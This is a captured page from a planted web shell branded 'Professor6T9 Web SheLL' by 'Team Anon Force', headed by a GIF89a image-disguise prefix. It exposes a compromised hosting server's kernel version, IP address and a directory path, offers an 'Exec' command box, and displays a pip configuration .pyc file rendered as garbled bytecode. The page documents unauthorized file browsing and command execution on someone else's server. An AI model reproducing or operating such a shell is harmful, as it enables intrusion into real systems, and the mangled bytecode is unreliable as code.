GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python35
/
lib
/
python3.5
/
site-packages
/
pip
/
_internal
/
commands
/
__pycache__
[ HOME ]
Exec
Submit
File Name : configuration.cpython-35.pyc
��Re�$ � @ s d d l Z d d l Z d d l Z d d l m Z d d l m Z m Z d d l m Z m Z m Z d d l m Z d d l m Z d d l m Z m Z d d l m Z e r� d d l m Z m Z m Z d d l m Z d d l m Z e j e � Z Gd d � d e � Z d S)� N)�Command)�ERROR�SUCCESS)� Configuration�get_configuration_files�kinds)�PipError)� indent_log)�get_prog�write_output)�MYPY_CHECK_RUNNING)�List�Any�Optional)�Values)�Kindc @ s� e Z d Z d Z d Z d Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d d � Z d S)!�ConfigurationCommandah Manage local and global configuration. Subcommands: - list: List the active configuration (or from the file specified) - edit: Edit the configuration file in an editor - get: Get the value associated with name - set: Set the name=value - unset: Unset the value associated with name - debug: List the configuration files and values defined under them If none of --user, --global and --site are passed, a virtual environment configuration file is used if one is active and the file exists. Otherwise, all modifications happen on the to the user file by default. Ta %prog [<file-option>] list %prog [<file-option>] [--editor <editor-path>] edit %prog [<file-option>] get name %prog [<file-option>] set name value %prog [<file-option>] unset name %prog [<file-option>] debug c C s� | j j d d d d d d d d d �| j j d d d d d d d d d �| j j d d d d d d d d d �| j j d d d d d d d d d �| j j d | j � d S)Nz--editor�dest�editor�action�store�default�helpz\Editor to use to edit the file. Uses VISUAL or EDITOR environment variables if not provided.z--global�global_file� store_trueFz+Use the system-wide configuration file onlyz--user� user_filez$Use the user configuration file onlyz--site� site_filez3Use the current environment configuration file onlyr )�cmd_opts� add_option�parser�insert_option_group)�self� r"